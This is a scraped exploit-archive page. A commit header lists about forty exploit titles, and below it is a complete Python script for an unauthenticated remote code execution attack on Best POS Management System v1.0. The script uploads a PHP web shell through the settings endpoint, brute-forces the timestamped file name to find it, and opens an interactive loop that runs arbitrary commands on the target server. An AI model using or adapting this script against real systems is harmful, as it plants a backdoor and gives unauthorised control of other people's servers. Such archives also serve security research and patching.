0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
148 lines
No EOL
4.1 KiB
Python
Executable file
148 lines
No EOL
4.1 KiB
Python
Executable file
# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
|
|
# Google Dork: NA
|
|
# Date: 15/5/2023
|
|
# Exploit Author: Mesut Cetin
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
|
|
# Version: 1.0
|
|
# Tested on: Kali Linux
|
|
|
|
import sys
|
|
import requests
|
|
import subprocess
|
|
import time
|
|
|
|
if len(sys.argv) < 2:
|
|
print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
|
|
print("Example: %s 192.168.106.130" % sys.argv[0])
|
|
sys.exit(1)
|
|
|
|
ip = sys.argv[1]
|
|
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
|
|
|
|
def brute_force_timestamp(timestamp_prev, ip):
|
|
progress = 0
|
|
webshell = None
|
|
|
|
for i in range(20):
|
|
for j in range(0, 1000, 20):
|
|
timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
|
|
url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
|
|
|
|
response = requests.get(url)
|
|
if response.status_code == 200:
|
|
webshell = url
|
|
break
|
|
|
|
progress += 1
|
|
print(f"Attempt {progress}/400", end="\r")
|
|
time.sleep(0.1)
|
|
|
|
if progress >= 400:
|
|
break
|
|
|
|
if webshell or progress >= 400:
|
|
break
|
|
|
|
if webshell:
|
|
print("\033[92m[+] Webshell found:", webshell, "\033[0m")
|
|
else:
|
|
print("\033[91m[-] Webshell not found\033[0m")
|
|
|
|
return webshell
|
|
|
|
def get_unix_timestamp():
|
|
timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
|
|
return int(timestamp)
|
|
|
|
def extract_output(response_text):
|
|
start_tag = "<pre>"
|
|
end_tag = "</pre>"
|
|
start_index = response_text.find(start_tag)
|
|
end_index = response_text.find(end_tag)
|
|
|
|
if start_index != -1 and end_index != -1 and start_index < end_index:
|
|
output = response_text[start_index + len(start_tag):end_index]
|
|
return output.strip()
|
|
|
|
return None
|
|
|
|
def code_execution(webshell):
|
|
if not webshell:
|
|
print("\033[91mWebshell URI not provided\033[0m")
|
|
return
|
|
|
|
while True:
|
|
command = input("Enter command to execute (or 'exit' to quit): ")
|
|
if command == 'exit':
|
|
break
|
|
|
|
url = webshell + f"?cmd={command}"
|
|
response = requests.get(url)
|
|
|
|
output = extract_output(response.text)
|
|
if output:
|
|
print("\033[93m[+] Output:\033[0m")
|
|
print(output)
|
|
else:
|
|
print("\033[91m[-] No output received\033[0m")
|
|
|
|
data = '''\
|
|
-----------------------------49858899034227071432271107689
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
test
|
|
-----------------------------49858899034227071432271107689
|
|
Content-Disposition: form-data; name="email"
|
|
|
|
test@gmail.com
|
|
-----------------------------49858899034227071432271107689
|
|
Content-Disposition: form-data; name="contact"
|
|
|
|
9000000000
|
|
-----------------------------49858899034227071432271107689
|
|
Content-Disposition: form-data; name="about"
|
|
|
|
test
|
|
-----------------------------49858899034227071432271107689
|
|
Content-Disposition: form-data; name="img"; filename="shell.php"
|
|
Content-Type: application/x-php
|
|
|
|
<html>
|
|
<body>
|
|
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
|
|
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
|
|
<input type="SUBMIT" value="Execute">
|
|
</form>
|
|
<pre>
|
|
<?php
|
|
if(isset($_GET['cmd']))
|
|
{
|
|
system($_GET['cmd']);
|
|
}
|
|
?>
|
|
</pre>
|
|
</body>
|
|
</html>
|
|
|
|
-----------------------------49858899034227071432271107689--'''
|
|
|
|
headers = {
|
|
'Host': f"{ip}",
|
|
'X-Requested-With': 'XMLHttpRequest',
|
|
'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
|
|
'Content-Length': str(len(data)),
|
|
'Connection': 'close'
|
|
}
|
|
|
|
timestamp_prev = get_unix_timestamp()
|
|
response = requests.post(url, data=data, headers=headers)
|
|
|
|
if response.status_code == 200 and response.text == '1':
|
|
print("[+] Timestamp: %s" % timestamp_prev)
|
|
print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
|
|
webshell = brute_force_timestamp(timestamp_prev, ip)
|
|
code_execution(webshell)
|
|
|
|
else:
|
|
print("Did not worked") |